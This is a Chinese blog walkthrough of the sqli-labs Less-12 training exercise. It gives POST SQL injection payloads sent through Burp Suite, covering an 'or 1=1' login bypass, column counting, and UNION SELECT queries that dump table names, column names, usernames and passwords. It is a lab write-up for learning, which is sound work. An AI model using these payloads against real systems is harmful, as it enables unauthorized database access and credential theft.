sqli-labs Less-12

本文详细介绍了如何利用Burp Suite进行SQL注入攻击,以Less-12为例,通过判断注入类型、注入点、字段数,到获取数据库名、表名、字段名,最后提取所有字段值的过程。主要涉及双引号加括号的字符串注入技巧。

Less-12 POST -Error Based - Double quotes - String - with twist

Less-11 与 Less-12差别在于一个是单引号一个是双引号加括号,对于Less-12就直接用burp suite来做练习,步骤与Less-11基本一致。

0x01.原页面在这里插入图片描述

在这里插入图片描述
用户名和密码两个参数分别为uname和passwd。Burp中提交参数uname=xxx&passwd=xxx

0x02.判断注入类型

uname=1&passwd=1&submit=Submit
在这里插入图片描述
uname=1’&passwd=1&submit=Submit
在这里插入图片描述
uname=1"&passwd=1&submit=Submit

在这里插入图片描述

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1") LIMIT 0,1' at line 1

根据报错语句可以看出是双引号加一个括号的字符型注入

0x03.判断注入点
万能密码尝试:
uname=1") or 1=1#&passwd=1&submit=Submit
在这里插入图片描述0x04.判断字段数

uname=admin") order by 3#&passwd=1&submit=Submit
在这里插入图片描述
uname=admin") order by 2#&passwd=1&submit=Submit
在这里插入图片描述

查询语句返回的字段数为2,但是并不是表中的字段数为2。

0x05.获取用户和数据库名
uname=1") union select user(),database()–+&passwd=1&submit=Submit在这里插入图片描述
0x06.获取security数据库中的所有表名
uname=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’#&passwd=1&submit=Submit

在这里插入图片描述
0x07.获取users表中所有字段名
uname=1") union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’#&passwd=1&submit=Submit在这里插入图片描述
0x08.获取所有字段值
uname=1") union select 1,group_concat(username,0x3a,password) from users#&passwd=1&submit=Submit

在这里插入图片描述

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值